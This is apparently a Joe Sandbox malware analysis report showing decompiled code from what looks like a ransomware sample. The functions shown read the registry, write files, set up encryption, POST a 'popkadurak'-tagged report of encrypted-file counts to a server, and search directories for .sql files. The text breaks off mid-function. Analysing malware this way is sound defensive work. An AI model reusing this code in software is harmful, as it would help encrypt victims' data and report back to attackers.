Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID:
API String ID: 3573210778-0
Opcode ID: 38549453462d9f2e321688ea2dc3f3027c59bcac376d96817f21cafb30b8b3ea
Instruction ID: 1e02329cb0013d69983e72bdce2ff9279244943b7f61632a30d0cfde5406f96d
Opcode Fuzzy Hash: 38549453462d9f2e321688ea2dc3f3027c59bcac376d96817f21cafb30b8b3ea
Instruction Fuzzy Hash: DC01FE32108111AFDB209F90AC45B6A73ECEF84316F318024FD0996145DF3598168BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0F697410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F697410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0f697426
0x0f697430
0x0f697484
0x0f697432
0x0f697435
0x0f697447
0x0f69744f
0x0f697466
0x0f69746f
0x0f69747b
0x0f697451
0x0f697454
0x0f697457
0x0f697463
0x0f697463
0x0f69744f

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0F697885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F697426
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0F697885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F697447
RegCloseKey.KERNEL32(?,?,0F697885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F697457
GetLastError.KERNEL32(?,0F697885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F697466
RegCloseKey.ADVAPI32(?,?,0F697885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F69746F

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: b283d62f551ca81927808cfbac30bdce0e709f1bbc1b94b8dc240acf16a3eccf
Instruction ID: f94f4f59d4bbcddb2102bf3f6ac3b5228c0b8e02939593b961244baf4eb16c89
Opcode Fuzzy Hash: b283d62f551ca81927808cfbac30bdce0e709f1bbc1b94b8dc240acf16a3eccf
Instruction Fuzzy Hash: 10011A3260412DEBCF109FD4ED09D9ABBACEB08766B008162FD05D6211D7329A24EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0F692830 Relevance: 4.5, APIs: 3, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F692830(WCHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t3;
				int _t7;
				void* _t9;
				void* _t14;
				struct _OVERLAPPED* _t17;

				_push(__ecx);
				_t9 = __edx; // executed
				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_t14 = _t3;
				_t17 = 0;
				if(_t14 != 0xffffffff) {
					if(_t9 == 0) {
						L3:
						_t17 = 1;
					} else {
						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
						if(_t7 != 0) {
							goto L3;
						}
					}
					FindCloseChangeNotification(_t14); // executed
				}
				return _t17;
			}

0x0f692833
0x0f69284a
0x0f69284c
0x0f692852
0x0f692854
0x0f692859
0x0f69285d
0x0f692873
0x0f692873
0x0f69285f
0x0f692869
0x0f692871
0x00000000
0x00000000
0x0f692871
0x0f692879
0x0f692879
0x0f692887

APIs

CreateFileW.KERNEL32(0F692C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,0F692C02,?,0F69293C,?), ref: 0F69284C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0F69293C,?,?,?,?,0F692C02), ref: 0F692869
FindCloseChangeNotification.KERNEL32(00000000,?,0F69293C,?,?,?,?,0F692C02), ref: 0F692879

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: 5c210eb31c3e5d493e7253807984528f688d5444adcc2fa21612539c87cf6708
Instruction ID: 7dbb5b4c43b24e38dda059c5d6e789d3087b304096ed4a403ab26ae7dee27cae
Opcode Fuzzy Hash: 5c210eb31c3e5d493e7253807984528f688d5444adcc2fa21612539c87cf6708
Instruction Fuzzy Hash: B9F0A77230421477E7300ED5AC89FBBB69CD786B71F504225FE08E61C1D6A5AD1542A4

Uniqueness

Uniqueness Score: -1.00%

Function 0F696550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F696550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0F6963E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0f696553
0x0f696554
0x0f696565
0x0f69656e
0x0f69657f
0x0f696588
0x0f69658d
0x0f696597
0x0f6965b5
0x0f6965b9
0x0f6965c3
0x0f6965c8
0x0f6965c8
0x0f6965d2
0x0f6965df

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0F694B9E), ref: 0F696565
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0F694B9E), ref: 0F69657F

Part of subcall function 0F6963E0: CryptAcquireContextW.ADVAPI32(0F694B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F694B96,?,0F694B9E), ref: 0F6963F8
Part of subcall function 0F6963E0: GetLastError.KERNEL32(?,0F694B9E), ref: 0F696402
Part of subcall function 0F6963E0: CryptAcquireContextW.ADVAPI32(0F694B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F694B9E), ref: 0F69641E

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: fb610631fbda495d79e3d3f411d9fb592393023a1d67cc362c2366b3a7924e95
Instruction ID: 48649b2038c711903964503182853e43e154605819bdd3efbd805614697f5ad8
Opcode Fuzzy Hash: fb610631fbda495d79e3d3f411d9fb592393023a1d67cc362c2366b3a7924e95
Instruction Fuzzy Hash: 9111C974A44208EFDB04CF84DA55F99B7F9EF88709F208188E904AB381D7B5AF109B54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F6953D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0F6953D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0F695F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0F6933E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0F695350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0F697E40( &_v104);
						_v92 = E0F695220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xf69fb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xf69fb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xf69fb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xf69fb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xf69fb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xf69fb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0F698050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0F6953D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xf6a2a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xf6a2a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

0x0f6953d9
0x0f6953db
0x0f6953e5
0x0f6953ed
0x0f6953f0
0x0f6953f0
0x0f6953f6
0x0f6953fc
0x0f695401
0x0f69540c
0x0f69540c
0x0f695408
0x0f695408
0x0f695408
0x0f69540e
0x0f69541b
0x0f695421
0x0f695423
0x0f6954dc
0x00000000
0x0f695429
0x0f695429
0x0f69542e
0x0f695433
0x0f695436
0x0f69543a
0x0f69543f
0x0f695447
0x0f6954e4
0x0f6954e9
0x0f6954ea
0x0f6954eb
0x0f6954ec
0x0f6954ed
0x0f6954ee
0x0f6954ef
0x0f6954f6
0x0f6954f7
0x0f6954f8
0x0f6954fa
0x0f6954fd
0x0f695501
0x0f695504
0x0f69550f
0x0f695525
0x0f69552c
0x0f695542
0x0f695546
0x0f695549
0x0f69554b
0x0f695558
0x0f695558
0x0f695558
0x0f69554d
0x0f69554d
0x0f695550
0x0f695552
0x00000000
0x0f695554
0x0f695554
0x0f695554
0x0f695552
0x0f69555e
0x0f695564
0x0f69556d
0x0f695572
0x0f69557a
0x0f69557f
0x0f695587
0x0f69558c
0x0f695594
0x0f695599
0x0f6955a1
0x0f6955a6
0x0f6955ae
0x0f6955b3
0x0f6955bc
0x0f6955c5
0x0f6955c9
0x0f6955ca
0x0f6955d2
0x0f6955d7
0x0f6955e1
0x0f6955e2
0x0f6955e3
0x0f6955e9
0x0f6955ee
0x0f6955ef
0x0f6955f4
0x0f6955f6
0x0f6955f8
0x0f6955fc
0x0f695601
0x0f695609
0x0f695610
0x0f695615
0x0f695617
0x0f695627
0x0f695627
0x0f695619
0x0f695619
0x0f69561c
0x0f69561e
0x0f695623
0x0f695623
0x0f69561e
0x0f695617
0x0f695601
0x0f695637
0x0f695643
0x0f69564d
0x0f69564f
0x0f695652
0x0f695654
0x0f695657
0x0f695657
0x0f695665
0x0f69544d
0x0f69544d
0x0f695452
0x0f695459
0x0f69545c
0x0f69545f
0x0f695466
0x0f69546d
0x0f695481
0x0f69548a
0x0f69548e
0x0f695492
0x0f695492
0x0f69548e
0x0f69549e
0x0f6954a5
0x0f6954ad
0x0f6954af
0x0f6954af
0x0f6954b6
0x0f6954be
0x0f6954be
0x0f6954c0
0x0f6954c3
0x0f6954cd
0x0f6954db
0x0f6954db
0x0f695447

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F6953DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F6953F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F69541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F695615,00000000,popkadurak), ref: 0F695477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F695615,00000000,popkadurak), ref: 0F695481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F695615,00000000,popkadurak), ref: 0F695492
HeapFree.KERNEL32(00000000,?,?,?,?,0F695615,00000000,popkadurak), ref: 0F6954AD
HeapFree.KERNEL32(00000000,?,?,?,?,0F695615,00000000,popkadurak), ref: 0F6954BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F6954CD
GetLastError.KERNEL32(?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F6954DC
lstrlenA.KERNEL32(00000000,00000000,00000000,74CB6980), ref: 0F695512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F695532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F695544
lstrcatA.KERNEL32(00000000,?), ref: 0F69555E
lstrlenA.KERNEL32(00000000), ref: 0F6955B3
lstrlenW.KERNEL32(?), ref: 0F6955BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F6955DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F695637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F695643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F69564D
InternetCloseHandle.WININET(0F69581B), ref: 0F695657

Strings

popkadurak, xrefs: 0F6955E9
POST, xrefs: 0F6955CA

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: 85b86ddf85b82c3e79c4ae11c4469c347b9497f092c6ccb9bd2d1dd499751a1b
Instruction ID: 6cd110ce42ceb104e947837782ab1582bbb3c96c61f9e26e586a323a789dc609
Opcode Fuzzy Hash: 85b86ddf85b82c3e79c4ae11c4469c347b9497f092c6ccb9bd2d1dd499751a1b
Instruction Fuzzy Hash: 5A71E031E08309ABDF119FA59C45FAEBBFCEB88712F141115EA05E3241DB79A941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0F695670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F695670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0F693BC0( &_v164);
				E0F697490( &_v164, _t82);
				E0F6972A0( &_v164);
				E0F6970A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xf6a2a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xf6a2a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0F695F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0F6954F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F697D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

0x0f695670
0x0f695670
0x0f695690
0x0f695693
0x0f695696
0x0f695698
0x0f69569d
0x0f6956a9
0x0f6956ab
0x0f69569f
0x0f69569f
0x0f69569f
0x0f6956a5
0x0f6956a5
0x0f6956ad
0x0f6956bf
0x0f6956c8
0x0f6956ca
0x0f6956cb
0x0f6956d0
0x0f6956d2
0x0f6956d3
0x0f6956d5
0x0f6956d6
0x0f6956d8
0x0f6956d9
0x0f6956db
0x0f6956dc
0x0f6956de
0x0f6956e1
0x0f6956e3
0x0f6956e4
0x0f6956ec
0x0f6956f7
0x0f695702
0x0f695718
0x0f69571e
0x0f695724
0x0f69572a
0x0f69572f
0x0f695739
0x0f695739
0x0f695757
0x0f695759
0x0f695760
0x0f69576d
0x0f695773
0x0f695773
0x0f69577b
0x0f695780
0x0f69578f
0x0f6957a6
0x0f6957a8
0x0f6957a8
0x0f6957be
0x0f6957be
0x0f6957cb
0x0f6957ce
0x0f6957d0
0x0f6957d3
0x0f6957d8
0x0f6957e1
0x0f6957e1
0x0f6957da
0x0f6957da
0x0f6957df
0x00000000
0x00000000
0x0f6957df
0x0f6957e9
0x0f6957ef
0x0f6957f1
0x0f6957f4
0x0f6957f4
0x0f6957f9
0x0f6957ff
0x0f695801
0x0f695801
0x0f695803
0x0f69580a
0x0f6957f4
0x0f695816
0x0f695830
0x0f69583d
0x0f695845
0x0f695854
0x0f695858
0x0f69585e

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F695696
wsprintfW.USER32 ref: 0F6956BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F695708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F69571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F695739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F69574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F695757
wsprintfA.USER32 ref: 0F69576D
CryptBinaryToStringA.CRYPT32(00000000,74CB66A0,40000001,00000000,?), ref: 0F69579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F6957A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F6957B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F6957C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F6957CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F6957EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F695804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F69583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F695854

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F6956B9
popkadurak, xrefs: 0F695746, 0F695762

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: a62c9bea3f8ffaba775e6f6f61f050f0aba1be9469fdb6688665872853f407cd
Instruction ID: ea9ffb32f5e0a0da29843da185ca6fc8ef66e80388bc0b613f1d37a30492697d
Opcode Fuzzy Hash: a62c9bea3f8ffaba775e6f6f61f050f0aba1be9469fdb6688665872853f407cd
Instruction Fuzzy Hash: 6A51D670A44314BFEF219FA4DC46FAE7BBCEB44711F540058F606A6281DAB4AE14CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0F696BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F696BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
